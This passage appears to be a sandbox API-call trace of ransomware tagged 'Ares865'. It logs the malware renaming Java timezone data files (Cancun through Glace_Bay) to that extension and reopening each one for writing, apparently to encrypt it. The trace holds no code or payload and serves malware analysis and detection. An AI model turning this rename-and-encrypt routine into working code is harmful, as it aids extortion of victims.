lstrlenW (lpString="Ares865") returned 7 [0135.198] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun.Ares865") returned 62 [0135.198] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun.ares865"), dwFlags=0x1) returned 1 [0135.199] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.199] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=792) returned 1 [0135.202] lstrcpyW (in: lpString1=0x2cce460, lpString2="Caracas" | out: lpString1="Caracas") returned="Caracas" [0135.202] lstrlenW (lpString="Caracas") returned 7 [0135.202] lstrlenW (lpString="Ares865") returned 7 [0135.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas.Ares865") returned 63 [0135.202] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas.ares865"), dwFlags=0x1) returned 1 [0135.204] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0135.210] lstrcpyW (in: lpString1=0x2cce460, lpString2="Cayenne" | out: lpString1="Cayenne") returned="Cayenne" [0135.210] lstrlenW (lpString="Cayenne") returned 7 [0135.210] lstrlenW (lpString="Ares865") returned 7 [0135.210] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne.Ares865") returned 63 [0135.211] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne.ares865"), dwFlags=0x1) returned 1 [0135.212] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.215] lstrcpyW (in: lpString1=0x2cce460, lpString2="Cayman" | out: lpString1="Cayman") returned="Cayman" [0135.215] lstrlenW (lpString="Cayman") returned 6 [0135.215] lstrlenW (lpString="Ares865") returned 7 [0135.216] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman.Ares865") returned 62 [0135.216] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman.ares865"), dwFlags=0x1) returned 1 [0135.217] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.221] lstrcpyW (in: lpString1=0x2cce460, lpString2="Chicago" | out: lpString1="Chicago") returned="Chicago" [0135.221] lstrlenW (lpString="Chicago") returned 7 [0135.221] lstrlenW (lpString="Ares865") returned 7 [0135.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago.Ares865") returned 63 [0135.221] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago.ares865"), dwFlags=0x1) returned 1 [0135.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.223] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1960) returned 1 [0135.225] lstrcpyW (in: lpString1=0x2cce460, lpString2="Chihuahua" | out: lpString1="Chihuahua") returned="Chihuahua" [0135.225] lstrlenW (lpString="Chihuahua") returned 9 [0135.225] lstrlenW (lpString="Ares865") returned 7 [0135.225] lstrcmpiW (lpString1="ihuahua", lpString2="Ares865") returned 1 [0135.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua.Ares865") returned 65 [0135.226] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua.ares865"), dwFlags=0x1) returned 1 [0135.228] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.228] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=816) returned 1 [0135.231] lstrcpyW (in: lpString1=0x2cce460, lpString2="Costa_Rica" | out: lpString1="Costa_Rica") returned="Costa_Rica" [0135.231] lstrlenW (lpString="Costa_Rica") returned 10 [0135.231] lstrlenW (lpString="Ares865") returned 7 [0135.231] lstrcmpiW (lpString1="ta_Rica", lpString2="Ares865") returned 1 [0135.232] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica.Ares865") returned 66 [0135.232] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica.ares865"), dwFlags=0x1) returned 1 [0135.233] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.233] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0135.236] lstrcpyW (in: lpString1=0x2cce460, lpString2="Creston" | out: lpString1="Creston") returned="Creston" [0135.236] lstrlenW (lpString="Creston") returned 7 [0135.236] lstrlenW (lpString="Ares865") returned 7 [0135.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston.Ares865") returned 63 [0135.237] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston.ares865"), dwFlags=0x1) returned 1 [0135.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73) returned 1 [0135.242] lstrcpyW (in: lpString1=0x2cce460, lpString2="Cuiaba" | out: lpString1="Cuiaba") returned="Cuiaba" [0135.242] lstrlenW (lpString="Cuiaba") returned 6 [0135.242] lstrlenW (lpString="Ares865") returned 7 [0135.242] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba.Ares865") returned 62 [0135.242] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba.ares865"), dwFlags=0x1) returned 1 [0135.244] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.244] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1100) returned 1 [0135.247] lstrcpyW (in: lpString1=0x2cce460, lpString2="Curacao" | out: lpString1="Curacao") returned="Curacao" [0135.247] lstrlenW (lpString="Curacao") returned 7 [0135.247] lstrlenW (lpString="Ares865") returned 7 [0135.247] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao.Ares865") returned 63 [0135.247] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao.ares865"), dwFlags=0x1) returned 1 [0135.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.249] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.253] lstrcpyW (in: lpString1=0x2cce460, lpString2="Danmarkshavn" | out: lpString1="Danmarkshavn") returned="Danmarkshavn" [0135.253] lstrlenW (lpString="Danmarkshavn") returned 12 [0135.253] lstrlenW (lpString="Ares865") returned 7 [0135.253] lstrcmpiW (lpString1="rkshavn", lpString2="Ares865") returned 1 [0135.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn.Ares865") returned 68 [0135.253] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn.ares865"), dwFlags=0x1) returned 1 [0135.255] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=341) returned 1 [0135.258] lstrcpyW (in: lpString1=0x2cce460, lpString2="Dawson" | out: lpString1="Dawson") returned="Dawson" [0135.258] lstrlenW (lpString="Dawson") returned 6 [0135.258] lstrlenW (lpString="Ares865") returned 7 [0135.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson.Ares865") returned 62 [0135.258] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson.ares865"), dwFlags=0x1) returned 1 [0135.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.260] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1108) returned 1 [0135.263] lstrcpyW (in: lpString1=0x2cce460, lpString2="Dawson_Creek" | out: lpString1="Dawson_Creek") returned="Dawson_Creek" [0135.263] lstrlenW (lpString="Dawson_Creek") returned 12 [0135.263] lstrlenW (lpString="Ares865") returned 7 [0135.263] lstrcmpiW (lpString1="n_Creek", lpString2="Ares865") returned 1 [0135.263] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek.Ares865") returned 68 [0135.263] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek.ares865"), dwFlags=0x1) returned 1 [0135.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.265] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=509) returned 1 [0135.268] lstrcpyW (in: lpString1=0x2cce460, lpString2="Denver" | out: lpString1="Denver") returned="Denver" [0135.268] lstrlenW (lpString="Denver") returned 6 [0135.268] lstrlenW (lpString="Ares865") returned 7 [0135.269] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver.Ares865") returned 62 [0135.269] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver.ares865"), dwFlags=0x1) returned 1 [0135.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1336) returned 1 [0135.277] lstrcpyW (in: lpString1=0x2cce460, lpString2="Detroit" | out: lpString1="Detroit") returned="Detroit" [0135.277] lstrlenW (lpString="Detroit") returned 7 [0135.277] lstrlenW (lpString="Ares865") returned 7 [0135.277] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit.Ares865") returned 63 [0135.277] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit.ares865"), dwFlags=0x1) returned 1 [0135.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.279] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1200) returned 1 [0135.282] lstrcpyW (in: lpString1=0x2cce460, lpString2="Dominica" | out: lpString1="Dominica") returned="Dominica" [0135.282] lstrlenW (lpString="Dominica") returned 8 [0135.282] lstrlenW (lpString="Ares865") returned 7 [0135.282] lstrcmpiW (lpString1="ominica", lpString2="Ares865") returned 1 [0135.282] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica.Ares865") returned 64 [0135.282] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica.ares865"), dwFlags=0x1) returned 1 [0135.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.284] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.287] lstrcpyW (in: lpString1=0x2cce460, lpString2="Edmonton" | out: lpString1="Edmonton") returned="Edmonton" [0135.287] lstrlenW (lpString="Edmonton") returned 8 [0135.287] lstrlenW (lpString="Ares865") returned 7 [0135.287] lstrcmpiW (lpString1="dmonton", lpString2="Ares865") returned 1 [0135.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton.Ares865") returned 64 [0135.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton.ares865"), dwFlags=0x1) returned 1 [0135.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.290] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1316) returned 1 [0135.293] lstrcpyW (in: lpString1=0x2cce460, lpString2="Eirunepe" | out: lpString1="Eirunepe") returned="Eirunepe" [0135.293] lstrlenW (lpString="Eirunepe") returned 8 [0135.293] lstrlenW (lpString="Ares865") returned 7 [0135.293] lstrcmpiW (lpString1="irunepe", lpString2="Ares865") returned 1 [0135.293] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe.Ares865") returned 64 [0135.293] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe.ares865"), dwFlags=0x1) returned 1 [0135.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=321) returned 1 [0135.299] lstrcpyW (in: lpString1=0x2cce460, lpString2="El_Salvador" | out: lpString1="El_Salvador") returned="El_Salvador" [0135.299] lstrlenW (lpString="El_Salvador") returned 11 [0135.299] lstrlenW (lpString="Ares865") returned 7 [0135.299] lstrcmpiW (lpString1="alvador", lpString2="Ares865") returned -1 [0135.299] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador.Ares865") returned 67 [0135.299] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador.ares865"), dwFlags=0x1) returned 1 [0135.300] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.300] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=105) returned 1 [0135.304] lstrcpyW (in: lpString1=0x2cce460, lpString2="Fortaleza" | out: lpString1="Fortaleza") returned="Fortaleza" [0135.304] lstrlenW (lpString="Fortaleza") returned 9 [0135.304] lstrlenW (lpString="Ares865") returned 7 [0135.304] lstrcmpiW (lpString1="rtaleza", lpString2="Ares865") returned 1 [0135.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza.Ares865") returned 65 [0135.304] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza.ares865"), dwFlags=0x1) returned 1 [0135.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=377) returned 1 [0135.309] lstrcpyW (in: lpString1=0x2cce460, lpString2="Glace_Bay" | out: lpString1="Glace_Bay") returned="Glace_Bay" [0135.309] lstrlenW (lpString="Glace_Bay") returned 9 [0135.309] lstrlenW (lpString="Ares865") returned 7 [0135.309] lstrcmpiW (lpString1="ace_Bay", lpString2="Ares865") returned -1 [0135.310] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay.Ares865") returned 65 [0135.310] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay.ares865"), dwFlags=0x1) returned 1 [0135.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay.ares865"), 